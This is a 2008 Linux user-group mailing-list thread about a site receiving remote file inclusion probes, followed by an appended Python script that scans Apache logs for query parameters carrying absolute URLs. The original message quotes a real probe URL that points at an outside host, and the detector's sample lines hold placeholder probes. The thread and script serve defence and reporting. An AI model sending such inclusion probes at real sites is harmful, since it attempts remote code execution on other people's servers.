Hi Joshua,

I was hoping to find a place I could report these attempted exploits.
Something like the spam email RBLs.  If it does not exist, I wonder why.

I do appreciate everyone's input on how to secure our server and our code.


------------------------
Keith Smith




--- On Wed, 12/3/08, Joshua Zeidner <[EMAIL PROTECTED]> wrote:
From: Joshua Zeidner <[EMAIL PROTECTED]>
Subject: Re: OT: Website Exploits
To: [EMAIL PROTECTED], "Main PLUG discussion list" <[email protected]>
Date: Wednesday, December 3, 2008, 6:23 PM


   Am I the only one who noticed that you *did not* ask how to secure your 
site?  ;)

   -jmz

On Wed, Dec 3, 2008 at 6:17 PM, keith smith <[EMAIL PROTECTED]> wrote:



It is a custom site.  Basically one page does it all.  What content is 
displayed depends on what parameters/arguments are used in the URL.  
I set up a switch to test the URL parameters against known values.  
If no known value is entered, it defaults to the 404 page.  


I'm thinking that is pretty secure.


------------------------
Keith Smith



--- On Wed, 12/3/08, Lisa Kachold <[EMAIL PROTECTED]> wrote:

From: Lisa Kachold <[EMAIL PROTECTED]>
Subject: RE: OT: Website Exploits

To: [EMAIL PROTECTED], [email protected]
Date: Wednesday, December 3, 2008, 5:14 PM





What index.php are you using?  Is this WordPress?
http://archive.cert.uni-stuttgart.de/bugtraq/2007/03/msg00030.html

There are many php exploits:  
http://archive.cert.uni-stuttgart.de/bugtraq/2007/03/msg00031.html


www.Obnosis.com |  http://en.wiktionary.org/wiki/Citations:obnosis |
http://www.urbandictionary.com/define.php?term=obnosis (503)754-4452
Catch the January PLUG HackFest!   Kristy Westphal, CSO for the Arizona 
Department of Economic Security will provide a one hour presentation on 
forensics.

Date: Wed, 3 Dec 2008 14:57:35 -0800
From: [EMAIL PROTECTED]
Subject: Re: OT: Website Exploits
To: [email protected]




Thank you for the heads up on mod_security.  I'm not sure if that is installed 
or not.

Thanks again!


------------------------
Keith Smith


--- On Wed, 12/3/08, JD Austin <[EMAIL PROTECTED]> wrote:

From: JD Austin <[EMAIL PROTECTED]>
Subject: Re: OT: Website Exploits
To: [EMAIL PROTECTED], "Main PLUG discussion list" <[email protected]>
Date: Wednesday, December 3, 2008, 3:48 PM

That is a fairly common tactic.  

It exploits poor input validation and register globals in PHP.
Do yourself a huge favor and install mod_security (I assume you're using 
Apache?) as an extra measure of security if you haven't already.



On Wed, Dec 3, 2008 at 3:39 PM, keith smith <[EMAIL PROTECTED]> wrote:




Hi,

I am working on a website that gets a lot of exploit attempts.

They mostly look like this:  
/index.php?display=http://humano.ya.com/mysons/index.htm?



Our code is set to disregard any value that is not expected.  

I'm wondering if there is a clearing house for reporting this type of stuff.  I 
have the IP address as reported.... if that is accurate.



Thanks in advance!

Keith







      
---------------------------------------------------

PLUG-discuss mailing list - [email protected]

To subscribe, unsubscribe, or to change your mail settings:

http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
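
The requests quoted in the original message put an absolute URL into a query parameter, which is the shape of a remote file inclusion probe. As an added example (not code from anyone in this thread), the Python below pulls such requests out of an Apache-style access log and groups them by client IP, which is the evidence an abuse report would need. The log format, the sample lines and the function names are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Common/combined log format: client IP ... "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')
# A parameter value that is itself an absolute URL, like the probes in the thread.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

def remote_url_params(target):
    """Return names of query parameters whose decoded value is an absolute URL."""
    query = urlsplit(target).query
    # parse_qsl percent-decodes, so display=http%3A%2F%2F... is caught as well.
    return [name for name, value in parse_qsl(query, keep_blank_values=True)
            if REMOTE_RE.match(value)]

def summarize(lines):
    """Group suspected inclusion probes by client IP: {ip: {"hits", "params"}}."""
    report = defaultdict(lambda: {"hits": 0, "params": set()})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected log format
        ip, _method, target, _status = m.groups()
        params = remote_url_params(target)
        if params:
            report[ip]["hits"] += 1
            report[ip]["params"].update(params)
    return dict(report)

# Constructed sample lines (documentation IP ranges, placeholder hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Dec/2008:15:30:01 -0700] '
    '"GET /index.php?display=http://example.invalid/x.txt? HTTP/1.1" 404 512',
    '192.0.2.10 - - [03/Dec/2008:15:30:05 -0700] '
    '"GET /index.php?page=HTTP%3A%2F%2Fexample.invalid%2Fy.txt%3F HTTP/1.1" 404 512',
    '198.51.100.7 - - [03/Dec/2008:15:31:00 -0700] '
    '"GET /index.php?display=about HTTP/1.1" 200 2048',
    '203.0.113.5 - - [03/Dec/2008:15:32:10 -0700] '
    '"GET /index.php?display=ftp://example.invalid/z HTTP/1.0" 404 512',
    'not a log line',
]

if __name__ == "__main__":
    for ip, info in sorted(summarize(SAMPLE_LOG).items()):
        print(ip, info["hits"], sorted(info["params"]))
```

A parameter that legitimately carries a URL (a redirect target, for instance) will also match, so review the parameter names before treating a hit as hostile.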

